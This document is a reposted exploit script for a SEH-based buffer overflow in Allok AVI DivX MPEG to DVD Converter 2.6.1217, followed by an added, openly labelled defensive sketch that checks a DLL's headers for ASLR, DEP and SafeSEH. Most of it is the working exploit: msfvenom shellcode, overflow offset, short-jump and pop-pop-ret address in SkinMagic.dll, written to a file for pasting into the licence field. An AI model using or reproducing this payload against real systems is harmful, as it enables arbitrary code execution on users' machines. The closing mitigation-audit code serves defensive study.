Allok AVI DivX MPEG To DVD Converter 2.6.1217 Buffer Overflow
Source: vfocus.net  Author: wetw0rk  Published: 2018-03-30
#!/usr/bin/env python
#
# Exploit Title         : Allok AVI DivX MPEG to DVD Converter - Buffer Overflow (SEH)
# Date                  : 3/27/18
# Exploit Author        : wetw0rk
# Vulnerable Software   : Allok AVI DivX MPEG to DVD Converter
# Vendor Homepage       : http://alloksoft.com/
# Version               : 2.6.1217
# Software Link         : http://alloksoft.com/allok_avimpeg2dvd.exe
# Tested On             : Windows 10 , Windows 7 (x86-64)
#
# Greetz : Paul, Sally, Nekotaijutsu, mvrk, abatchy17
#
# Trigger the vulnerability by:
#   Copy text file contents -> paste into "License Name" -> calc
#

shellcode = "\x90" * 20 # nop sled
shellcode += (          # msfvenom -a x86 --platform windows -p windows/exec CMD=calc.exe -b "\x00\x09\x0a\x0d" -f c
"\xd9\xe9\xd9\x74\x24\xf4\xbe\x4b\x88\x2c\x8f\x58\x31\xc9\xb1"
"\x31\x83\xe8\xfc\x31\x70\x14\x03\x70\x5f\x6a\xd9\x73\xb7\xe8"
"\x22\x8c\x47\x8d\xab\x69\x76\x8d\xc8\xfa\x28\x3d\x9a\xaf\xc4"
"\xb6\xce\x5b\x5f\xba\xc6\x6c\xe8\x71\x31\x42\xe9\x2a\x01\xc5"
"\x69\x31\x56\x25\x50\xfa\xab\x24\x95\xe7\x46\x74\x4e\x63\xf4"
"\x69\xfb\x39\xc5\x02\xb7\xac\x4d\xf6\x0f\xce\x7c\xa9\x04\x89"
"\x5e\x4b\xc9\xa1\xd6\x53\x0e\x8f\xa1\xe8\xe4\x7b\x30\x39\x35"
"\x83\x9f\x04\xfa\x76\xe1\x41\x3c\x69\x94\xbb\x3f\x14\xaf\x7f"
"\x42\xc2\x3a\x64\xe4\x81\x9d\x40\x15\x45\x7b\x02\x19\x22\x0f"
"\x4c\x3d\xb5\xdc\xe6\x39\x3e\xe3\x28\xc8\x04\xc0\xec\x91\xdf"
"\x69\xb4\x7f\xb1\x96\xa6\x20\x6e\x33\xac\xcc\x7b\x4e\xef\x9a"
"\x7a\xdc\x95\xe8\x7d\xde\x95\x5c\x16\xef\x1e\x33\x61\xf0\xf4"
"\x70\x9d\xba\x55\xd0\x36\x63\x0c\x61\x5b\x94\xfa\xa5\x62\x17"
"\x0f\x55\x91\x07\x7a\x50\xdd\x8f\x96\x28\x4e\x7a\x99\x9f\x6f"
"\xaf\xfa\x7e\xfc\x33\xd3\xe5\x84\xd6\x2b"
)

offset  = "A" * 780
nSEH    = "\x90\x90\xeb\x06" # jmp +0x06
SEH     = "\x30\x45\x01\x10" # pop edi, pop esi, ret [SkinMagic.dll]
trigger = "D" * (50000 - len(# trigger the vuln (plenty of space!!!)
    offset  +
    nSEH    +
    SEH     +
    shellcode
    )
)

payload = offset + nSEH + SEH + shellcode + trigger 
fd = open("pasteME.txt", "w")
fd.write(payload)
fd.close()
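
Added example, not part of the original exploit or the author's code: the SEH value above is a hard-coded address inside SkinMagic.dll, which only stays valid when that module loads at a predictable base and is not covered by SafeSEH. This sketch reads the mitigation bits a defender would audit in such a bundled DLL. The function names and the sample header are constructed for illustration; real use would pass the DLL's bytes read from disk.

```python
import struct

# IMAGE_DLLCHARACTERISTICS_* bits from the PE/COFF specification
DYNAMIC_BASE, NX_COMPAT, NO_SEH = 0x0040, 0x0100, 0x0400
LOAD_CONFIG_INDEX = 10  # data directory slot that would reference a SafeSEH table

def pe_mitigations(data):
    """Return exploit-mitigation facts read from a PE image's headers."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE file: missing MZ signature")
    (pe_off,) = struct.unpack_from("<I", data, 0x3C)       # e_lfanew
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("not a PE file: missing PE signature")
    opt = pe_off + 4 + 20                                   # skip signature + COFF header
    (magic,) = struct.unpack_from("<H", data, opt)
    if magic not in (0x10B, 0x20B):
        raise ValueError("unknown optional header magic")
    pe32 = magic == 0x10B
    image_base = struct.unpack_from("<I" if pe32 else "<Q", data, opt + (28 if pe32 else 24))[0]
    (flags,) = struct.unpack_from("<H", data, opt + 70)     # DllCharacteristics
    dirs = opt + (96 if pe32 else 112)                      # start of data directories
    (ndirs,) = struct.unpack_from("<I", data, dirs - 4)     # NumberOfRvaAndSizes
    load_cfg_rva = 0
    if ndirs > LOAD_CONFIG_INDEX:
        (load_cfg_rva,) = struct.unpack_from("<I", data, dirs + 8 * LOAD_CONFIG_INDEX)
    return {
        "image_base": image_base,
        "aslr": bool(flags & DYNAMIC_BASE),
        "dep": bool(flags & NX_COMPAT),
        "no_seh": bool(flags & NO_SEH),
        # SafeSEH tables live in the load config directory; no directory, no table.
        "has_load_config": load_cfg_rva != 0,
    }

def build_sample_pe32(image_base, dll_characteristics, load_cfg_rva=0):
    """Constructed minimal PE32 header (not a real DLL) for exercising the parser."""
    opt = bytearray(96 + 16 * 8)                            # optional header + 16 directories
    struct.pack_into("<H", opt, 0, 0x10B)                   # PE32 magic
    struct.pack_into("<I", opt, 28, image_base)
    struct.pack_into("<H", opt, 70, dll_characteristics)
    struct.pack_into("<I", opt, 92, 16)                     # NumberOfRvaAndSizes
    struct.pack_into("<I", opt, 96 + 8 * LOAD_CONFIG_INDEX, load_cfg_rva)
    dos = bytearray(b"MZ") + bytearray(0x3E)                # 0x40-byte DOS header
    struct.pack_into("<I", dos, 0x3C, 0x40)                 # e_lfanew -> PE signature
    coff = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, len(opt), 0x2102)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)

if __name__ == "__main__":
    # Constructed header with no mitigation bits set and no load config directory.
    print(pe_mitigations(build_sample_pe32(0x10000000, 0x0000)))
```

A module that reports `aslr` false, `no_seh` false and `has_load_config` false is the kind whose fixed addresses can be reused as an SEH handler target; rebuilding or replacing it with `/DYNAMICBASE`, `/NXCOMPAT` and `/SAFESEH` is the corresponding fix.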
